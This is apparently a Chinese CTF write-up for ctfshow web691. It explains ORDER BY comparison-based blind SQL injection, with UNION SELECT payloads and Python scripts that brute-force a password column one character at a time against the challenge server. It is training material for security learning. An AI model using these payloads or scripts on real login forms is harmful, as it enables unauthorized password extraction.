SQL order by 大小比較盲注

在做ctfshow web入門 的 web691時遇到了SQL order by 大小比較盲注問題。因為是第一次遇到，記錄一下

在做題之前，我們先來探討一下order by 比較大小盲注

在本地先自己搭建一個數據庫

我們輸入查詢語句

SELECT * FROM `login` WHERE name=1 or 1 union SELECT 1,1,1 order by 3;

更換一下查詢語句

SELECT * FROM `login` WHERE name=1 or 1 union SELECT 1,1,2 order by 3;

這里很明顯就能看出，當用聯合查詢出來的passwd值1時，最終回顯的是name=1而當我們輸入passwd值為2時，最終回顯的是name=admin即為第一條數據，并且在實際中我們不知道passwd的值，會回顯一個密碼錯誤，這樣我們就可以根據回顯一位一位來爆破password的值

s = '0123456789:abcdefghijklmnopqrstuvwxyz{'
password=''
for i in range(50):
    for j in s:
        payload=password+j
        data={
            'username':"'or 1 union select 1,1,'"+payload+"' order by 3#",
            'passwd':''
            }
        r=requests.post(url,data=data)
        if "wrong pass!" in r.text:
            password+=chr(ord(j)-1)
            print(password)
            break

回歸到原題

<?php
 
include('inc.php');
highlight_file(__FILE__);
error_reporting(0);
function   filter($str){
      $filterlist = "/\(|\)|username|password|where|
      case|when|like|regexp|into|limit|=|for|;/";
      if(preg_match($filterlist,strtolower($str))){
        die("illegal input!");
      }
      return $str;
  }
$username = isset($_POST['username'])?
filter($_POST['username']):die("please input username!");
$password = isset($_POST['password'])?
filter($_POST['password']):die("please input password!");
$sql = "select * from admin where  username =
 '$username' and password = '$password' ";

$res = $conn -> query($sql);
if($res->num_rows>0){
  $row = $res -> fetch_assoc();
  if($row['id']){
     echo $row['username'];
  }
}else{
   echo "The content in the password column is the flag!";
}
?>

首先我們先通過order by 來猜測有3個字段

#username=1' or 1 union select 1,1 order by 2#&password=1
#回顯"The content in the password column is the flag!"

username=1' or 1 union select 1,1,1 order by 3#&password=1

3個字段大概率為id,username,password

username=1' or 1 union select 1,1,'c' order by 3#&password=1

返回1,表明我們輸入的c的ascill碼還是小

username=1' or 1 union select 1,1,'d' order by 3#&password=1

成功回顯admin

但這里要注意的是我們最后獲得真實值是要在回顯admin時的ascii減1

如圖，真實passwd的第一位是小1的

直接上腳本

import requests
s=".0123456789:abcdefghijklmnopqrstuvwxyz{|}~"
print(s)
url="http://29a1ba96-4095-4b96-adbb-56e359b5e690.challenge.ctf.show/"
data={
	'username':"or 1 union select 1,1,'{}' order by 3#",
	'password':'1'
}
k=""
for i in range(1,50):
	print(i)
	for j in s:
		data={
		'username':"' or 1 union select 1,1,'{0}' order by 3#".format(k+j),
		'password':'1'
	}
		r=requests.post(url,data=data)
		#print(data['username'])
		if("</code>admin" in r.text):
			k=k+chr(ord(j)-1)
			print(k)
			break